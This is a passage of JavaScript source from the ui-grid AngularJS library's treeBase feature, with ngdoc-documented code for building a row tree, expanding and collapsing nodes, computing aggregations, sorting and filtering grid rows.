The array order is material - we will display the children in the order * they are stored in the array * * Each node stores: * * - the state of this node * - an array of children of this node * - a pointer to the parent of this node (reverse pointer, allowing us to walk up the tree) * - the number of children of this node * - aggregation information calculated from the nodes * * ``` * [{ * state: 'expanded', * row: <reference to row>, * parentRow: null, * aggregations: [{ * type: 'count', * col: <gridCol>, * value: 2, * label: 'count: ', * rendered: 'count: 2' * }], * children: [ * { * state: 'expanded', * row: <reference to row>, * parentRow: <reference to row>, * aggregations: [{ * type: 'count', * col: '<gridCol>, * value: 4, * label: 'count: ', * rendered: 'count: 4' * }], * children: [ * { state: 'expanded', row: <reference to row>, parentRow: <reference to row> }, * { state: 'collapsed', row: <reference to row>, parentRow: <reference to row> }, * { state: 'expanded', row: <reference to row>, parentRow: <reference to row> }, * { state: 'collapsed', row: <reference to row>, parentRow: <reference to row> } * ] * }, * { * state: 'collapsed', * row: <reference to row>, * parentRow: <reference to row>, * aggregations: [{ * type: 'count', * col: <gridCol>, * value: 3, * label: 'count: ', * rendered: 'count: 3' * }], * children: [ * { state: 'expanded', row: <reference to row>, parentRow: <reference to row> }, * { state: 'collapsed', row: <reference to row>, parentRow: <reference to row> }, * { state: 'expanded', row: <reference to row>, parentRow: <reference to row> } * ] * } * ] * }, {<another level 0 node maybe>} ] * ``` * Missing state values are false - meaning they aren't expanded. * * This is used because the rowProcessors run every time the grid is refreshed, so * we'd lose the expanded state every time the grid was refreshed. This instead gives * us a reliable lookup that persists across rowProcessors. * * This tree is rebuilt every time we run the rowsProcessors. Since each row holds a pointer * to it's tree node we can persist expand/collapse state across calls to rowsProcessor, we discard * all transient information on the tree (children, childCount) and recalculate it * */ grid.treeBase.tree = []; service.defaultGridOptions(grid.options); grid.registerRowsProcessor(service.treeRows, 410); grid.registerColumnBuilder( service.treeBaseColumnBuilder ); service.createRowHeader( grid ); /** * @ngdoc object * @name ui.grid.treeBase.api:PublicApi * * @description Public Api for treeBase feature */ var publicApi = { events: { treeBase: { /** * @ngdoc event * @eventOf ui.grid.treeBase.api:PublicApi * @name rowExpanded * @description raised whenever a row is expanded. If you are dynamically * rendering your tree you can listen to this event, and then retrieve * the children of this row and load them into the grid data. * * When the data is loaded the grid will automatically refresh to show these new rows * * <pre> * gridApi.treeBase.on.rowExpanded(scope,function(row){}) * </pre> * @param {gridRow} row the row that was expanded. You can also * retrieve the grid from this row with row.grid */ rowExpanded: {}, /** * @ngdoc event * @eventOf ui.grid.treeBase.api:PublicApi * @name rowCollapsed * @description raised whenever a row is collapsed. Doesn't really have * a purpose at the moment, included for symmetry * * <pre> * gridApi.treeBase.on.rowCollapsed(scope,function(row){}) * </pre> * @param {gridRow} row the row that was collapsed. 
You can also * retrieve the grid from this row with row.grid */ rowCollapsed: {} } }, methods: { treeBase: { /** * @ngdoc function * @name expandAllRows * @methodOf ui.grid.treeBase.api:PublicApi * @description Expands all tree rows */ expandAllRows: function () { service.expandAllRows(grid); }, /** * @ngdoc function * @name collapseAllRows * @methodOf ui.grid.treeBase.api:PublicApi * @description collapse all tree rows */ collapseAllRows: function () { service.collapseAllRows(grid); }, /** * @ngdoc function * @name toggleRowTreeState * @methodOf ui.grid.treeBase.api:PublicApi * @description call expand if the row is collapsed, collapse if it is expanded * @param {gridRow} row the row you wish to toggle */ toggleRowTreeState: function (row) { service.toggleRowTreeState(grid, row); }, /** * @ngdoc function * @name expandRow * @methodOf ui.grid.treeBase.api:PublicApi * @description expand the immediate children of the specified row * @param {gridRow} row the row you wish to expand * @param {boolean} recursive true if you wish to expand the row's ancients */ expandRow: function (row, recursive) { service.expandRow(grid, row, recursive); }, /** * @ngdoc function * @name expandRowChildren * @methodOf ui.grid.treeBase.api:PublicApi * @description expand all children of the specified row * @param {gridRow} row the row you wish to expand */ expandRowChildren: function (row) { service.expandRowChildren(grid, row); }, /** * @ngdoc function * @name collapseRow * @methodOf ui.grid.treeBase.api:PublicApi * @description collapse the specified row. When * you expand the row again, all grandchildren will retain their state * @param {gridRow} row the row you wish to collapse */ collapseRow: function ( row ) { service.collapseRow(grid, row); }, /** * @ngdoc function * @name collapseRowChildren * @methodOf ui.grid.treeBase.api:PublicApi * @description collapse all children of the specified row. When * you expand the row again, all grandchildren will be collapsed * @param {gridRow} row the row you wish to collapse children for */ collapseRowChildren: function ( row ) { service.collapseRowChildren(grid, row); }, /** * @ngdoc function * @name getTreeState * @methodOf ui.grid.treeBase.api:PublicApi * @description Get the tree state for this grid, * used by the saveState feature * Returned treeState as an object * `{ expandedState: { uid: 'expanded', uid: 'collapsed' } }` * where expandedState is a hash of row uid and the current expanded state * * @returns {object} tree state * * TODO - this needs work - we need an identifier that persists across instantiations, * not uid. This really means we need a row identity defined, but that won't work for * grouping. Perhaps this needs to be moved up to treeView and grouping, rather than * being in base. 
*/ getTreeExpandedState: function () { return { expandedState: service.getTreeState(grid) }; }, /** * @ngdoc function * @name setTreeState * @methodOf ui.grid.treeBase.api:PublicApi * @description Set the expanded states of the tree * @param {object} config the config you want to apply, in the format * provided by getTreeState */ setTreeState: function ( config ) { service.setTreeState( grid, config ); }, /** * @ngdoc function * @name getRowChildren * @methodOf ui.grid.treeBase.api:PublicApi * @description Get the children of the specified row * @param {GridRow} row the row you want the children of * @returns {Array} array of children of this row, the children * are all gridRows */ getRowChildren: function ( row ){ return row.treeNode.children.map( function( childNode ){ return childNode.row; }); } } } }; grid.api.registerEventsFromObject(publicApi.events); grid.api.registerMethodsFromObject(publicApi.methods); }, defaultGridOptions: function (gridOptions) { //default option to true unless it was explicitly set to false /** * @ngdoc object * @name ui.grid.treeBase.api:GridOptions * * @description GridOptions for treeBase feature, these are available to be * set using the ui-grid {@link ui.grid.class:GridOptions gridOptions} */ /** * @ngdoc object * @name treeRowHeaderBaseWidth * @propertyOf ui.grid.treeBase.api:GridOptions * @description Base width of the tree header, provides for a single level of tree. This * is incremented by `treeIndent` for each extra level * <br/>Defaults to 30 */ gridOptions.treeRowHeaderBaseWidth = gridOptions.treeRowHeaderBaseWidth || 30; /** * @ngdoc object * @name treeIndent * @propertyOf ui.grid.treeBase.api:GridOptions * @description Number of pixels of indent for the icon at each tree level, wider indents are visually more pleasing, * but will make the tree row header wider * <br/>Defaults to 10 */ gridOptions.treeIndent = (gridOptions.treeIndent != null) ? gridOptions.treeIndent : 10; /** * @ngdoc object * @name showTreeRowHeader * @propertyOf ui.grid.treeBase.api:GridOptions * @description If set to false, don't create the row header. You'll need to programmatically control the expand * states * <br/>Defaults to true */ gridOptions.showTreeRowHeader = gridOptions.showTreeRowHeader !== false; /** * @ngdoc object * @name showTreeExpandNoChildren * @propertyOf ui.grid.treeBase.api:GridOptions * @description If set to true, show the expand/collapse button even if there are no * children of a node. You'd use this if you're planning to dynamically load the children * * <br/>Defaults to true, grouping overrides to false */ gridOptions.showTreeExpandNoChildren = gridOptions.showTreeExpandNoChildren !== false; /** * @ngdoc object * @name treeRowHeaderAlwaysVisible * @propertyOf ui.grid.treeBase.api:GridOptions * @description If set to true, row header even if there are no tree nodes * * <br/>Defaults to true */ gridOptions.treeRowHeaderAlwaysVisible = gridOptions.treeRowHeaderAlwaysVisible !== false; /** * @ngdoc object * @name treeCustomAggregations * @propertyOf ui.grid.treeBase.api:GridOptions * @description Define custom aggregation functions. The properties of this object will be * aggregation types available for use on columnDef with {@link ui.grid.treeBase.api:ColumnDef treeAggregationType} or through the column menu. * If a function defined here uses the same name as one of the native aggregations, this one will take precedence. 
* The object format is: * * <pre> * { * aggregationName: { * label: (optional) string, * aggregationFn: function( aggregation, fieldValue, numValue, row ){...}, * finalizerFn: (optional) function( aggregation ){...} * }, * mean: { * label: 'mean', * aggregationFn: function( aggregation, fieldValue, numValue ){ * aggregation.count = (aggregation.count || 1) + 1; * aggregation.sum = (aggregation.sum || 0) + numValue; * }, * finalizerFn: function( aggregation ){ * aggregation.value = aggregation.sum / aggregation.count * } * } * } * </pre> * * <br/>The `finalizerFn` may be used to manipulate the value before rendering, or to * apply a custom rendered value. If `aggregation.rendered` is left undefined, the value will be * rendered. Note that the native aggregation functions use an `finalizerFn` to concatenate * the label and the value. * * <br/>Defaults to {} */ gridOptions.treeCustomAggregations = gridOptions.treeCustomAggregations || {}; /** * @ngdoc object * @name enableExpandAll * @propertyOf ui.grid.treeBase.api:GridOptions * @description Enable the expand all button at the top of the row header * * <br/>Defaults to true */ gridOptions.enableExpandAll = gridOptions.enableExpandAll !== false; }, /** * @ngdoc function * @name treeBaseColumnBuilder * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Sets the tree defaults based on the columnDefs * * @param {object} colDef columnDef we're basing on * @param {GridColumn} col the column we're to update * @param {object} gridOptions the options we should use * @returns {promise} promise for the builder - actually we do it all inline so it's immediately resolved */ treeBaseColumnBuilder: function (colDef, col, gridOptions) { /** * @ngdoc object * @name customTreeAggregationFn * @propertyOf ui.grid.treeBase.api:ColumnDef * @description A custom function that aggregates rows into some form of * total. Aggregations run row-by-row, the function needs to be capable of * creating a running total. * * The function will be provided the aggregation item (in which you can store running * totals), the row value that is to be aggregated, and that same row value converted to * a number (most aggregations work on numbers) * @example * <pre> * customTreeAggregationFn = function ( aggregation, fieldValue, numValue, row ){ * // calculates the average of the squares of the values * if ( typeof(aggregation.count) === 'undefined' ){ * aggregation.count = 0; * } * aggregation.count++; * * if ( !isNaN(numValue) ){ * if ( typeof(aggregation.total) === 'undefined' ){ * aggregation.total = 0; * } * aggregation.total = aggregation.total + numValue * numValue; * } * * aggregation.value = aggregation.total / aggregation.count; * } * </pre> * <br/>Defaults to undefined. May be overwritten by treeAggregationType, the two options should not be used together. */ if ( typeof(colDef.customTreeAggregationFn) !== 'undefined' ){ col.treeAggregationFn = colDef.customTreeAggregationFn; } /** * @ngdoc object * @name treeAggregationType * @propertyOf ui.grid.treeBase.api:ColumnDef * @description Use one of the native or grid-level aggregation methods for calculating aggregations on this column. * Native method are in the constants file and include: SUM, COUNT, MIN, MAX, AVG. This may also be the property the * name of an aggregation function defined with {@link ui.grid.treeBase.api:GridOptions treeCustomAggregations}. 
* * <pre> * treeAggregationType = uiGridTreeBaseConstants.aggregation.SUM, * } * </pre> * * If you are using aggregations you should either: * * - also use grouping, in which case the aggregations are displayed in the group header, OR * - use treeView, in which case you can set `treeAggregationUpdateEntity: true` in the colDef, and * treeBase will store the aggregation information in the entity, or you can set `treeAggregationUpdateEntity: false` * in the colDef, and you need to manual retrieve the calculated aggregations from the row.treeNode.aggregations * * <br/>Takes precendence over a treeAggregationFn, the two options should not be used together. * <br/>Defaults to undefined. */ if ( typeof(colDef.treeAggregationType) !== 'undefined' ){ col.treeAggregation = { type: colDef.treeAggregationType }; if ( typeof(gridOptions.treeCustomAggregations[colDef.treeAggregationType]) !== 'undefined' ){ col.treeAggregationFn = gridOptions.treeCustomAggregations[colDef.treeAggregationType].aggregationFn; col.treeAggregationFinalizerFn = gridOptions.treeCustomAggregations[colDef.treeAggregationType].finalizerFn; col.treeAggregation.label = gridOptions.treeCustomAggregations[colDef.treeAggregationType].label; } else if ( typeof(service.nativeAggregations()[colDef.treeAggregationType]) !== 'undefined' ){ col.treeAggregationFn = service.nativeAggregations()[colDef.treeAggregationType].aggregationFn; col.treeAggregation.label = service.nativeAggregations()[colDef.treeAggregationType].label; } } /** * @ngdoc object * @name treeAggregationLabel * @propertyOf ui.grid.treeBase.api:ColumnDef * @description A custom label to use for this aggregation. If provided we don't use native i18n. */ if ( typeof(colDef.treeAggregationLabel) !== 'undefined' ){ if (typeof(col.treeAggregation) === 'undefined' ){ col.treeAggregation = {}; } col.treeAggregation.label = colDef.treeAggregationLabel; } /** * @ngdoc object * @name treeAggregationUpdateEntity * @propertyOf ui.grid.treeBase.api:ColumnDef * @description Store calculated aggregations into the entity, allowing them * to be displayed in the grid using a standard cellTemplate. This defaults to true, * if you are using grouping then you shouldn't set it to false, as then the aggregations won't * display. * * If you are using treeView in most cases you'll want to set this to true. This will result in * getCellValue returning the aggregation rather than whatever was stored in the cell attribute on * the entity. If you want to render the underlying entity value (and do something else with the aggregation) * then you could use a custom cellTemplate to display `row.entity.myAttribute`, rather than using getCellValue. * * <br/>Defaults to true * * @example * <pre> * gridOptions.columns = [{ * name: 'myCol', * treeAggregation: { type: uiGridTreeBaseConstants.aggregation.SUM }, * treeAggregationUpdateEntity: true * cellTemplate: '<div>{{row.entity.myCol + " " + row.treeNode.aggregations[0].rendered}}</div>' * }]; * </pre> */ col.treeAggregationUpdateEntity = colDef.treeAggregationUpdateEntity !== false; /** * @ngdoc object * @name customTreeAggregationFinalizerFn * @propertyOf ui.grid.treeBase.api:ColumnDef * @description A custom function that populates aggregation.rendered, this is called when * a particular aggregation has been fully calculated, and we want to render the value. 
* * With the native aggregation options we just concatenate `aggregation.label` and * `aggregation.value`, but if you wanted to apply a filter or otherwise manipulate the label * or the value, you can do so with this function. This function will be called after the * the default `finalizerFn`. * * @example * <pre> * customTreeAggregationFinalizerFn = function ( aggregation ){ * aggregation.rendered = aggregation.label + aggregation.value / 100 + '%'; * } * </pre> * <br/>Defaults to undefined. */ if ( typeof(col.customTreeAggregationFinalizerFn) === 'undefined' ){ col.customTreeAggregationFinalizerFn = colDef.customTreeAggregationFinalizerFn; } }, /** * @ngdoc function * @name createRowHeader * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Create the rowHeader. If treeRowHeaderAlwaysVisible then * set it to visible, otherwise set it to invisible * * @param {Grid} grid grid object */ createRowHeader: function( grid ){ var rowHeaderColumnDef = { name: uiGridTreeBaseConstants.rowHeaderColName, displayName: '', width: grid.options.treeRowHeaderBaseWidth, minWidth: 10, cellTemplate: 'ui-grid/treeBaseRowHeader', headerCellTemplate: 'ui-grid/treeBaseHeaderCell', enableColumnResizing: false, enableColumnMenu: false, exporterSuppressExport: true, allowCellFocus: true }; rowHeaderColumnDef.visible = grid.options.treeRowHeaderAlwaysVisible; grid.addRowHeaderColumn(rowHeaderColumnDef, -100); }, /** * @ngdoc function * @name expandAllRows * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Expands all nodes in the tree * * @param {Grid} grid grid object */ expandAllRows: function (grid) { grid.treeBase.tree.forEach( function( node ) { service.setAllNodes( grid, node, uiGridTreeBaseConstants.EXPANDED); }); grid.treeBase.expandAll = true; grid.queueGridRefresh(); }, /** * @ngdoc function * @name collapseAllRows * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Collapses all nodes in the tree * * @param {Grid} grid grid object */ collapseAllRows: function (grid) { grid.treeBase.tree.forEach( function( node ) { service.setAllNodes( grid, node, uiGridTreeBaseConstants.COLLAPSED); }); grid.treeBase.expandAll = false; grid.queueGridRefresh(); }, /** * @ngdoc function * @name setAllNodes * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Works through a subset of grid.treeBase.rowExpandedStates, setting * all child nodes (and their descendents) of the provided node to the given state. * * Calls itself recursively on all nodes so as to achieve this. 
* * @param {Grid} grid the grid we're operating on (so we can raise events) * @param {object} treeNode a node in the tree that we want to update * @param {string} targetState the state we want to set it to */ setAllNodes: function (grid, treeNode, targetState) { if ( typeof(treeNode.state) !== 'undefined' && treeNode.state !== targetState ){ treeNode.state = targetState; if ( targetState === uiGridTreeBaseConstants.EXPANDED ){ grid.api.treeBase.raise.rowExpanded(treeNode.row); } else { grid.api.treeBase.raise.rowCollapsed(treeNode.row); } } // set all child nodes if ( treeNode.children ){ treeNode.children.forEach(function( childNode ){ service.setAllNodes(grid, childNode, targetState); }); } }, /** * @ngdoc function * @name toggleRowTreeState * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Toggles the expand or collapse state of this grouped row, if * it's a parent row * * @param {Grid} grid grid object * @param {GridRow} row the row we want to toggle */ toggleRowTreeState: function ( grid, row ){ if ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ){ return; } if (row.treeNode.state === uiGridTreeBaseConstants.EXPANDED){ service.collapseRow(grid, row); } else { service.expandRow(grid, row, false); } grid.queueGridRefresh(); }, /** * @ngdoc function * @name expandRow * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Expands this specific row, showing only immediate children. * * @param {Grid} grid grid object * @param {GridRow} row the row we want to expand * @param {boolean} recursive true if you wish to expand the row's ancients */ expandRow: function ( grid, row, recursive ){ if ( recursive ){ var parents = []; while ( row && typeof(row.treeLevel) !== 'undefined' && row.treeLevel !== null && row.treeLevel >= 0 && row.treeNode.state !== uiGridTreeBaseConstants.EXPANDED ){ parents.push(row); row = row.treeNode.parentRow; } if ( parents.length > 0 ){ row = parents.pop(); while ( row ){ row.treeNode.state = uiGridTreeBaseConstants.EXPANDED; grid.api.treeBase.raise.rowExpanded(row); row = parents.pop(); } grid.treeBase.expandAll = service.allExpanded(grid.treeBase.tree); grid.queueGridRefresh(); } } else { if ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ){ return; } if ( row.treeNode.state !== uiGridTreeBaseConstants.EXPANDED ){ row.treeNode.state = uiGridTreeBaseConstants.EXPANDED; grid.api.treeBase.raise.rowExpanded(row); grid.treeBase.expandAll = service.allExpanded(grid.treeBase.tree); grid.queueGridRefresh(); } } }, /** * @ngdoc function * @name expandRowChildren * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Expands this specific row, showing all children. 
* * @param {Grid} grid grid object * @param {GridRow} row the row we want to expand */ expandRowChildren: function ( grid, row ){ if ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ){ return; } service.setAllNodes(grid, row.treeNode, uiGridTreeBaseConstants.EXPANDED); grid.treeBase.expandAll = service.allExpanded(grid.treeBase.tree); grid.queueGridRefresh(); }, /** * @ngdoc function * @name collapseRow * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Collapses this specific row * * @param {Grid} grid grid object * @param {GridRow} row the row we want to collapse */ collapseRow: function( grid, row ){ if ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ){ return; } if ( row.treeNode.state !== uiGridTreeBaseConstants.COLLAPSED ){ row.treeNode.state = uiGridTreeBaseConstants.COLLAPSED; grid.treeBase.expandAll = false; grid.api.treeBase.raise.rowCollapsed(row); grid.queueGridRefresh(); } }, /** * @ngdoc function * @name collapseRowChildren * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Collapses this specific row and all children * * @param {Grid} grid grid object * @param {GridRow} row the row we want to collapse */ collapseRowChildren: function( grid, row ){ if ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ){ return; } service.setAllNodes(grid, row.treeNode, uiGridTreeBaseConstants.COLLAPSED); grid.treeBase.expandAll = false; grid.queueGridRefresh(); }, /** * @ngdoc function * @name allExpanded * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Returns true if all rows are expanded, false * if they're not. Walks the tree to determine this. Used * to set the expandAll state. * * If the node has no children, then return true (it's immaterial * whether it is expanded). If the node has children, then return * false if this node is collapsed, or if any child node is not all expanded * * @param {object} tree the grid to check * @returns {boolean} whether or not the tree is all expanded */ allExpanded: function( tree ){ var allExpanded = true; tree.forEach( function( node ){ if ( !service.allExpandedInternal( node ) ){ allExpanded = false; } }); return allExpanded; }, allExpandedInternal: function( treeNode ){ if ( treeNode.children && treeNode.children.length > 0 ){ if ( treeNode.state === uiGridTreeBaseConstants.COLLAPSED ){ return false; } var allExpanded = true; treeNode.children.forEach( function( node ){ if ( !service.allExpandedInternal( node ) ){ allExpanded = false; } }); return allExpanded; } else { return true; } }, /** * @ngdoc function * @name treeRows * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description The rowProcessor that adds the nodes to the tree, and sets the visible * state of each row based on it's parent state * * Assumes it is always called after the sorting processor, and the grouping processor if there is one. * Performs any tree sorts itself after having built the tree * * Processes all the rows in order, setting the group level based on the $$treeLevel in the associated * entity, and setting the visible state based on the parent's state. * * Calculates the deepest level of tree whilst it goes, and updates that so that the header column can be correctly * sized. * * Aggregates if necessary along the way. 
* * @param {array} renderableRows the rows we want to process, usually the output from the previous rowProcessor * @returns {array} the updated rows */ treeRows: function( renderableRows ) { var grid = this; if (renderableRows.length === 0) { service.updateRowHeaderWidth( grid ); return renderableRows; } grid.treeBase.tree = service.createTree( grid, renderableRows ); service.updateRowHeaderWidth( grid ); service.sortTree( grid ); service.fixFilter( grid ); return service.renderTree( grid.treeBase.tree ); }, /** * @ngdoc function * @name createOrUpdateRowHeaderWidth * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Calculates the rowHeader width. * * If rowHeader is always present, updates the width. * * If rowHeader is only sometimes present (`treeRowHeaderAlwaysVisible: false`), determines whether there * should be one, then creates or removes it as appropriate, with the created rowHeader having the * right width. * * If there's never a rowHeader then never creates one: `showTreeRowHeader: false` * * @param {Grid} grid the grid we want to set the row header on */ updateRowHeaderWidth: function( grid ){ var rowHeader = grid.getColumn(uiGridTreeBaseConstants.rowHeaderColName); var newWidth = grid.options.treeRowHeaderBaseWidth + grid.options.treeIndent * Math.max(grid.treeBase.numberLevels - 1, 0); if ( rowHeader && newWidth !== rowHeader.width ){ rowHeader.width = newWidth; grid.queueRefresh(); } var newVisibility = true; if ( grid.options.showTreeRowHeader === false ){ newVisibility = false; } if ( grid.options.treeRowHeaderAlwaysVisible === false && grid.treeBase.numberLevels <= 0 ){ newVisibility = false; } if ( rowHeader && rowHeader.visible !== newVisibility ) { rowHeader.visible = newVisibility; rowHeader.colDef.visible = newVisibility; grid.queueGridRefresh(); } }, /** * @ngdoc function * @name renderTree * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Creates an array of rows based on the tree, exporting only * the visible nodes and leaves * * @param {array} nodeList The list of nodes - can be grid.treeBase.tree, or can be node.children when * we're calling recursively * @returns {array} renderable rows */ renderTree: function( nodeList ){ var renderableRows = []; nodeList.forEach( function ( node ){ if ( node.row.visible ){ renderableRows.push( node.row ); } if ( node.state === uiGridTreeBaseConstants.EXPANDED && node.children && node.children.length > 0 ){ renderableRows = renderableRows.concat( service.renderTree( node.children ) ); } }); return renderableRows; }, /** * @ngdoc function * @name createTree * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Creates a tree from the renderableRows * * @param {Grid} grid The grid * @param {array} renderableRows The rows we want to create a tree from * @returns {object} The tree we've build */ createTree: function( grid, renderableRows ) { var currentLevel = -1; var parents = []; var currentState; grid.treeBase.tree = []; grid.treeBase.numberLevels = 0; var aggregations = service.getAggregations( grid ); var createNode = function( row ){ if ( typeof(row.entity.$$treeLevel) !== 'undefined' && row.treeLevel !== row.entity.$$treeLevel ){ row.treeLevel = row.entity.$$treeLevel; } if ( row.treeLevel <= currentLevel ){ // pop any levels that aren't parents of this level, formatting the aggregation at the same time while ( row.treeLevel <= currentLevel ){ var lastParent = parents.pop(); service.finaliseAggregations( lastParent ); currentLevel--; } // reset our current 
state based on the new parent, set to expanded if this is a level 0 node if ( parents.length > 0 ){ currentState = service.setCurrentState(parents); } else { currentState = uiGridTreeBaseConstants.EXPANDED; } } // aggregate if this is a leaf node if ( ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ) && row.visible ){ service.aggregate( grid, row, parents ); } // add this node to the tree service.addOrUseNode(grid, row, parents, aggregations); if ( typeof(row.treeLevel) !== 'undefined' && row.treeLevel !== null && row.treeLevel >= 0 ){ parents.push(row); currentLevel++; currentState = service.setCurrentState(parents); } // update the tree number of levels, so we can set header width if we need to if ( grid.treeBase.numberLevels < row.treeLevel + 1){ grid.treeBase.numberLevels = row.treeLevel + 1; } }; renderableRows.forEach( createNode ); // finalise remaining aggregations while ( parents.length > 0 ){ var lastParent = parents.pop(); service.finaliseAggregations( lastParent ); } return grid.treeBase.tree; }, /** * @ngdoc function * @name addOrUseNode * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Creates a tree node for this row. If this row already has a treeNode * recorded against it, preserves the state, but otherwise overwrites the data. * * @param {grid} grid The grid we're operating on * @param {gridRow} row The row we want to set * @param {array} parents An array of the parents this row should have * @param {array} aggregationBase Empty aggregation information * @returns {undefined} Updates the parents array, updates the row to have a treeNode, and updates the * grid.treeBase.tree */ addOrUseNode: function( grid, row, parents, aggregationBase ){ var newAggregations = []; aggregationBase.forEach( function(aggregation){ newAggregations.push(service.buildAggregationObject(aggregation.col)); }); var newNode = { state: uiGridTreeBaseConstants.COLLAPSED, row: row, parentRow: null, aggregations: newAggregations, children: [] }; if ( row.treeNode ){ newNode.state = row.treeNode.state; } if ( parents.length > 0 ){ newNode.parentRow = parents[parents.length - 1]; } row.treeNode = newNode; if ( parents.length === 0 ){ grid.treeBase.tree.push( newNode ); } else { parents[parents.length - 1].treeNode.children.push( newNode ); } }, /** * @ngdoc function * @name setCurrentState * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Looks at the parents array to determine our current state. * If any node in the hierarchy is collapsed, then return collapsed, otherwise return * expanded. * * @param {array} parents An array of the parents this row should have * @returns {string} The state we should be setting to any nodes we see */ setCurrentState: function( parents ){ var currentState = uiGridTreeBaseConstants.EXPANDED; parents.forEach( function(parent){ if ( parent.treeNode.state === uiGridTreeBaseConstants.COLLAPSED ){ currentState = uiGridTreeBaseConstants.COLLAPSED; } }); return currentState; }, /** * @ngdoc function * @name sortTree * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Performs a recursive sort on the tree nodes, sorting the * children of each node and putting them back into the children array. * * Before doing this it turns back on all the sortIgnore - things that were previously * ignored we process now. Since we're sorting within the nodes, presumably anything * that was already sorted is how we derived the nodes, we can keep those sorts too. 
* * We only sort tree nodes that are expanded - no point in wasting effort sorting collapsed * nodes * * @param {Grid} grid The grid to get the aggregation information from * @returns {array} The aggregation information */ sortTree: function( grid ){ grid.columns.forEach( function( column ) { if ( column.sort && column.sort.ignoreSort ){ delete column.sort.ignoreSort; } }); grid.treeBase.tree = service.sortInternal( grid, grid.treeBase.tree ); }, sortInternal: function( grid, treeList ){ var rows = treeList.map( function( node ){ return node.row; }); rows = rowSorter.sort( grid, rows, grid.columns ); var treeNodes = rows.map( function( row ){ return row.treeNode; }); treeNodes.forEach( function( node ){ if ( node.state === uiGridTreeBaseConstants.EXPANDED && node.children && node.children.length > 0 ){ node.children = service.sortInternal( grid, node.children ); } }); return treeNodes; }, /** * @ngdoc function * @name fixFilter * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description After filtering has run, we need to go back through the tree * and make sure the parent rows are always visible if any of the child rows * are visible (filtering may make a child visible, but the parent may not * match the filter criteria) * * This has a risk of being computationally expensive, we do it by walking * the tree and remembering whether there are any invisible nodes on the * way down. * * @param {Grid} grid the grid to fix filters on */ fixFilter: function( grid ){ var parentsVisible; grid.treeBase.tree.forEach( function( node ){ if ( node.children && node.children.length > 0 ){ parentsVisible = node.row.visible; service.fixFilterInternal( node.children, parentsVisible ); } }); }, fixFilterInternal: function( nodes, parentsVisible) { nodes.forEach( function( node ){ if ( node.row.visible && !parentsVisible ){ service.setParentsVisible( node ); parentsVisible = true; } if ( node.children && node.children.length > 0 ){ if ( service.fixFilterInternal( node.children, ( parentsVisible && node.row.visible ) ) ) { parentsVisible = true; } } }); return parentsVisible; }, setParentsVisible: function( node ){ while ( node.parentRow ){ node.parentRow.visible = true; node = node.parentRow.treeNode; } }, /** * @ngdoc function * @name buildAggregationObject * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Build the object which is stored on the column for holding meta-data about the aggregation. * This method should only be called with columns which have an aggregation. 
* * @param {GridColumn} column The column which this object relates to * @returns {object} {col: GridColumn object, label: string, type: string (optional)} */ buildAggregationObject: function( column ){ var newAggregation = { col: column }; if ( column.treeAggregation && column.treeAggregation.type ){ newAggregation.type = column.treeAggregation.type; } if ( column.treeAggregation && column.treeAggregation.label ){ newAggregation.label = column.treeAggregation.label; } return newAggregation; }, /** * @ngdoc function * @name getAggregations * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Looks through the grid columns to find those with aggregations, * and collates the aggregation information into an array, returns that array * * @param {Grid} grid the grid to get the aggregation information from * @returns {array} the aggregation information */ getAggregations: function( grid ){ var aggregateArray = []; grid.columns.forEach( function(column){ if ( typeof(column.treeAggregationFn) !== 'undefined' ){ aggregateArray.push( service.buildAggregationObject(column) ); if ( grid.options.showColumnFooter && typeof(column.colDef.aggregationType) === 'undefined' && column.treeAggregation ){ // Add aggregation object for footer column.treeFooterAggregation = service.buildAggregationObject(column); column.aggregationType = service.treeFooterAggregationType; } } }); return aggregateArray; }, /** * @ngdoc function * @name aggregate * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Accumulate the data from this row onto the aggregations for each parent * * Iterate over the parents, then iterate over the aggregations for each of those parents, * and perform the aggregation for each individual aggregation * * @param {Grid} grid grid object * @param {GridRow} row the row we want to set grouping visibility on * @param {array} parents the parents that we would want to aggregate onto */ aggregate: function( grid, row, parents ){ if ( parents.length === 0 && row.treeNode && row.treeNode.aggregations ){ row.treeNode.aggregations.forEach(function(aggregation){ // Calculate aggregations for footer even if there are no grouped rows if ( typeof(aggregation.col.treeFooterAggregation) !== 'undefined' ) { var fieldValue = grid.getCellValue(row, aggregation.col); var numValue = Number(fieldValue); aggregation.col.treeAggregationFn(aggregation.col.treeFooterAggregation, fieldValue, numValue, row); } }); } parents.forEach( function( parent, index ){ if ( parent.treeNode.aggregations ){ parent.treeNode.aggregations.forEach( function( aggregation ){ var fieldValue = grid.getCellValue(row, aggregation.col); var numValue = Number(fieldValue); aggregation.col.treeAggregationFn(aggregation, fieldValue, numValue, row); if ( index === 0 && typeof(aggregation.col.treeFooterAggregation) !== 'undefined' ){ 